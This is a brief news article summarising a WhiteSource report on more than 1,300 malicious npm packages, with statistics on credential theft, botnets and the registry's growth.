The WhiteSource research report, released Februay 2, was based on data culled using the WhiteSource Diffend malware detection platform. WhiteSource said it has reported more than 1,300 malicious packages to NPM in the past six months.
Malware subsequently removed by NPM was found to be stealing both credentials and cryptocurrency and running botnets, said WhiteSource.
The company said that nearly 14 per cent of the malicious packages detected were designed to steal sensitive information such as credentials present in environment variables. While attackers using malicious packages often do not target particular companies or entities, some packages were designed to target certain systems.
Note that NPM does contain nearly two million packages, so 1,300 malicious packages amounts to significantly less than one percent.
WhiteSource described NPM as the most widely used package manager of any language, with the number of packages in the registry having grown from 1.3 million in April 2020 to more than 1.8 million today. Some 32,000 new packages were published monthly in 2021, according to WhiteSource.